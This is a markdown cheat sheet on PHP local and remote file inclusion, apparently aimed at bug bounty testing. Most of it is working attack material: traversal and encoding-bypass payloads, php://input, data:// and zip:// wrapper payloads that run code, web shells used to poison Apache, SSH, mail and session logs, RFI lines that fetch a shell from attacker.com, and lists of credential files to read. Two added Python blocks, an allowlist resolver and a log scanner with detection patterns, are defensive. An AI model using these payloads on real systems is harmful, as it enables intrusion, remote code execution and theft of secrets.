## Detection Points

### Common Vulnerable Parameters

```text
page=
file=
include=
path=
doc=
document=
folder=
root=
pg=
style=
pdf=
template=
php_path=
lang=
```

### Vulnerable Code Patterns

```php
include($_GET['page']);              // request value used as the include path unchanged
include($_GET['file'] . '.php');     // appended extension does not stop traversal or wrappers
require($user_input);                // any variable that carries unvalidated input
include_once($path);                 // same problem when $path derives from the request
```
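The fix for every pattern above is the same: the request value must never reach `include` as a path. The following is an added example in Python, not code from the original page, modelling the two defensible designs: a strict allowlist (the PHP equivalent is `in_array($page, $allowed, true)` followed by `include "pages/$page.php"`), and, where the set of files is genuinely dynamic, decode, canonicalise with `realpath()` and check that the result stays inside the intended directory. The temp web root, the page names (`home`, `about`, `contact`) and the `pages` directory are constructed for the demo.

```python
import os
import tempfile
from urllib.parse import unquote

# Constructed demo web root: a "pages" directory holding one legitimate include.
WEB_ROOT = tempfile.mkdtemp(prefix="lfi_demo_")
PAGES_DIR = os.path.join(WEB_ROOT, "pages")
os.makedirs(PAGES_DIR)
with open(os.path.join(PAGES_DIR, "about.php"), "w") as fh:
    fh.write("<?php echo 'about'; ?>\n")

# Design 1: strict allowlist. The request value is a lookup key, never a path.
ALLOWED_PAGES = {"home", "about", "contact"}   # assumed page names for the demo


def resolve_allowlisted(page, pages_dir=PAGES_DIR):
    """Return the file for a page name only if that exact name is allowlisted."""
    if page in ALLOWED_PAGES:
        return os.path.join(pages_dir, page + ".php")
    return None


# Design 2: dynamic file set. Decode, canonicalise, then check containment.
def fully_decode(value, max_rounds=3):
    """Undo repeated URL encoding so ..%252f is seen as ../ before any check runs."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_contained(page, pages_dir=PAGES_DIR, ext=".php"):
    """Return the real path of pages_dir/<page><ext> if it stays inside pages_dir, else None."""
    page = fully_decode(page)
    # NUL bytes, stream wrappers (php://, data://, zip://, ...) and UNC paths are never page names.
    if "\x00" in page or "://" in page or page.startswith("\\\\"):
        return None
    root = os.path.realpath(pages_dir)
    # join() discards pages_dir when page is absolute (/var/www/html/../../../etc/passwd),
    # which is why the containment check must run on the fully resolved path.
    candidate = os.path.realpath(os.path.join(root, page + ext))
    # commonpath avoids the startswith() trap where /srv/pages-old would pass as /srv/pages.
    if os.path.commonpath([root, candidate]) != root:
        return None
    # "....//" is not collapsed here, so it names literal "...." directories that do not exist.
    if not os.path.isfile(candidate):
        return None
    return candidate
```

Prefer design 1 whenever the page set is known; design 2 is the fallback for template or document stores. Both belong with `allow_url_include=Off` (its default) and an `open_basedir` restriction, which limit the blast radius when a check is missed.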
## Basic LFI Payloads

### Path Traversal

```text
?page=../../../etc/passwd
?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc/passwd
?page=..%252f..%252f..%252fetc/passwd
?page=..\/..\/..\/etc/passwd
?page=....\/....\/....\/etc/passwd
```

### Null Byte (PHP < 5.3.4)

```text
?page=../../../etc/passwd%00
?page=../../../etc/passwd%00.php
?page=../../../etc/passwd%00.jpg
```

### Path Truncation (PHP < 5.3)

```text
?page=../../../etc/passwd............[..extend to 4096 chars]
```
## PHP Wrappers

### php://filter - Read Source Code

```text
# Base64 encode (read PHP files without execution)
?page=php://filter/convert.base64-encode/resource=index.php
?page=php://filter/convert.base64-encode/resource=config.php
?page=php://filter/read=convert.base64-encode/resource=../config.php

# ROT13
?page=php://filter/read=string.rot13/resource=index.php

# UTF encoding
?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php

# Chained filters
?page=php://filter/read=string.toupper|string.rot13/resource=index.php
```

### php://input - RCE

```text
# Requirements: allow_url_include=On
?page=php://input
POST data: <?php system('id'); ?>

# POST request example
POST /vuln.php?page=php://input HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

<?php system($_GET['cmd']); ?>
```

### data:// - RCE

```text
# Requirements: allow_url_include=On
?page=data://text/plain,<?php system('id'); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
?page=data:text/plain,<?php echo shell_exec('id'); ?>
```

### expect:// - RCE

```text
# Requirements: expect extension installed
?page=expect://id
?page=expect://ls
```

### zip:// - RCE

```text
# Create malicious zip
echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip shell.zip shell.php

# Upload and access
?page=zip://uploads/shell.zip%23shell.php&cmd=id
```

### phar:// - RCE

```text
# Requires ability to upload phar file
?page=phar://uploads/shell.phar/test.txt
```
## Log Poisoning

### Apache Access Log

```text
# Poison User-Agent
GET /vuln.php?page=test HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>

# Include the log
?page=/var/log/apache2/access.log&cmd=id
?page=../../../var/log/apache2/access.log&cmd=id

# Common log locations
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/httpd/access_log
/usr/local/apache/log/access_log
```

### Apache Error Log

```text
# Trigger error with payload
GET /<?php system($_GET['cmd']); ?> HTTP/1.1

# Include error log
?page=/var/log/apache2/error.log&cmd=id
```

### SSH Log

```text
# Connect with payload as username
ssh '<?php system($_GET["cmd"]); ?>'@target.com

# Include auth log
?page=/var/log/auth.log&cmd=id
```

### Mail Log

```text
# Send email with PHP in subject/body
mail -s "<?php system(\$_GET['cmd']); ?>" www-data@target.com < /dev/null

# Include mail log
?page=/var/log/mail.log&cmd=id
```

### Proc Environ

```text
# Poison User-Agent or Referer
User-Agent: <?php system($_GET['cmd']); ?>

# Include proc/self/environ
?page=/proc/self/environ&cmd=id
```

### Session File Poisoning

```text
# Store payload in session
GET /set_session.php?name=<?php system($_GET['cmd']); ?> HTTP/1.1
Cookie: PHPSESSID=abc123

# Session file locations
/var/lib/php/sessions/sess_abc123
/tmp/sess_abc123
/var/lib/php5/sess_abc123

# Include session file
?page=/var/lib/php/sessions/sess_abc123&cmd=id
```
## Useful Files to Read

### Linux

```text
/etc/passwd
/etc/shadow (requires root)
/etc/hosts
/etc/hostname
/etc/issue
/proc/self/environ
/proc/self/cmdline
/proc/version
/home/<user>/.ssh/id_rsa
/home/<user>/.bash_history
/root/.bash_history
/var/mail/<user>
~/.ssh/authorized_keys
```

### Web Server Config

```text
# Apache
/etc/apache2/apache2.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf

# Nginx
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/var/log/nginx/access.log
/var/log/nginx/error.log
```

### Application Files

```text
/var/www/html/config.php
/var/www/html/.env
/var/www/html/wp-config.php
/var/www/html/configuration.php   # Joomla
/var/www/html/includes/config.php
```

### Windows

```text
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\system.ini
C:\Windows\win.ini
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
```
## Remote File Inclusion (RFI)

### Requirements

```text
allow_url_fopen = On
allow_url_include = On
```

### Basic RFI

```text
# Host shell.txt containing: <?php system($_GET['cmd']); ?>
?page=http://attacker.com/shell.txt
?page=http://attacker.com/shell.txt&cmd=id

# Bypass extension append (.php)
?page=http://attacker.com/shell.txt?
?page=http://attacker.com/shell.txt%00   # Null byte
```

### SMB for Windows

```text
?page=\\attacker.com\share\shell.php
```
## Filter Bypass

### Encoding

```text
# URL encoding
?page=..%2f..%2f..%2fetc%2fpasswd

# Double encoding
?page=..%252f..%252f..%252fetc%252fpasswd

# UTF-8 encoding
?page=..%c0%af..%c0%af..%c0%afetc/passwd
```

### Wrapper Prefix Bypass

```text
# If checking for http/https
?page=HtTp://attacker.com/shell.txt
?page=hTTp://attacker.com/shell.txt

# Alternative wrappers
?page=expect://id
?page=dict://localhost:11211/
```

### Directory Bypass

```text
# When blocking ../
?page=....//....//....//etc/passwd
?page=..../..../..../etc/passwd
?page=....\/....\/....\/etc/passwd

# When requiring specific directory
?page=/var/www/html/../../../etc/passwd
```
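Seen from the detection side, the bypasses in this section and the poisoning and file-read sections before it show why a rule that matches the literal string `../` is not enough: the inspection has to URL-decode repeatedly, normalise separators, match wrapper and scheme prefixes case-insensitively, and look at headers as well as query values. The following is an added example in Python, not code from the original page, that applies those checks to constructed Apache combined-format log lines (addresses, hostnames, timestamps and sizes are made up) covering traversal, double encoding, `....//`, `php://filter`, a mixed-case remote include, a `<?php` tag in the User-Agent, and a direct `/proc/self/environ` read. Every query parameter is inspected, since the parameter list at the top of the page is only the common names.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format log lines (not captured traffic). The first line is
# benign; each later one carries a technique from the sections above.
SAMPLE_LOG = r'''
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Oct/2024:13:55:37 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 1789 "-" "curl/8.0"
203.0.113.8 - - [10/Oct/2024:13:55:38 +0000] "GET /index.php?page=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1789 "-" "curl/8.0"
203.0.113.8 - - [10/Oct/2024:13:55:39 +0000] "GET /index.php?page=....//....//....//etc/passwd HTTP/1.1" 200 1789 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2024:13:55:40 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 3310 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2024:13:55:41 +0000] "GET /index.php?page=HtTp://attacker.example/shell.txt&cmd=id HTTP/1.1" 500 0 "-" "curl/8.0"
203.0.113.10 - - [10/Oct/2024:13:55:42 +0000] "GET /index.php?page=test HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
203.0.113.10 - - [10/Oct/2024:13:55:43 +0000] "GET /index.php?page=/proc/self/environ&cmd=id HTTP/1.1" 200 2048 "-" "curl/8.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Prefix checks are case-insensitive so HtTp:// and PhP:// do not slip past them.
WRAPPER_RE = re.compile(r"^(php|data|expect|zip|phar|glob|dict):", re.I)
REMOTE_RE = re.compile(r"^(https?://|ftp://|\\\\)", re.I)
SENSITIVE_RE = re.compile(
    r"etc/(passwd|shadow)|proc/self/(environ|cmdline)|var/log/|\.ssh/|\.bash_history"
    r"|(^|/)\.env$|wp-config\.php|web\.config|system32/config/sam", re.I)
OVERLONG_RE = re.compile(r"%c0%af|%c1%9c", re.I)   # overlong UTF-8 forms of "/" and "\"


def decode_rounds(value, max_rounds=3):
    """URL-decode repeatedly; return (decoded value, number of rounds that changed it)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_value(raw):
    """Indicator names found in a single query-parameter value."""
    decoded, rounds = decode_rounds(raw)
    norm = decoded.replace("\\", "/")           # treat ..\ like ../
    found = set()
    if rounds >= 2:
        found.add("double_encoded")
    if OVERLONG_RE.search(raw):
        found.add("overlong_utf8")
    if "../" in norm:                            # also catches ....// (contains "../")
        found.add("traversal")
    if "\x00" in decoded:
        found.add("nul_byte")
    if WRAPPER_RE.match(decoded):
        found.add("php_wrapper")
    if REMOTE_RE.match(decoded):
        found.add("remote_include")
    if SENSITIVE_RE.search(norm):
        found.add("sensitive_file")
    if "<?php" in decoded.lower() or "<?=" in decoded:
        found.add("php_tag_in_value")
    if len(decoded) > 1024:                      # path-truncation style padding
        found.add("oversized_value")
    return found


def inspect_request(target, user_agent="", referer=""):
    """Sorted indicator names for one request; every query value is checked."""
    found = set()
    for part in urlsplit(target).query.split("&"):
        if part:
            _, _, value = part.partition("=")   # split on the first "=" only
            found |= inspect_value(value)
    # Log-poisoning payloads arrive in headers that end up in access/error logs.
    for header in (user_agent, referer):
        if "<?php" in header.lower() or "<?=" in header:
            found.add("php_tag_in_header")
    return sorted(found)


def scan_log(text):
    """Return (ip, target, indicators) for every line that carries at least one indicator."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = inspect_request(m["target"], m["ua"], m["referer"])
        if indicators:
            hits.append((m["ip"], m["target"], indicators))
    return hits


if __name__ == "__main__":
    for ip, target, indicators in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(indicators), target)
```

The indicator names are deliberately separate rather than one "LFI" verdict: a `sensitive_file` hit with no `traversal` (the `/proc/self/environ` line) and a `php_tag_in_header` hit with a harmless page value are the two cases a single traversal signature misses, and they are exactly the log-poisoning and direct-read paths from the earlier sections.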
## LFI to RCE Paths

| Method | Requirements |
|---|---|
| php://input | allow_url_include=On |
| data:// | allow_url_include=On |
| Log poisoning | Write access to logs |
| Session poisoning | Ability to set session data |
| /proc/self/environ | Readable environ |
| File upload + LFI | Upload capability |
| Zip/Phar wrappers | Upload .zip/.phar files |
## Bug Bounty Tips

### Testing Strategy

```text
1. Identify all file inclusion parameters
2. Test basic path traversal
3. Try null bytes and encoding
4. Test PHP wrappers for source disclosure
5. Attempt log/session poisoning for RCE
6. Combine with file upload if available
```

### High-Impact Combination

```text
# LFI + File Upload = RCE
1. Upload image with PHP code in EXIF
2. Include uploaded file via LFI
3. Execute code
```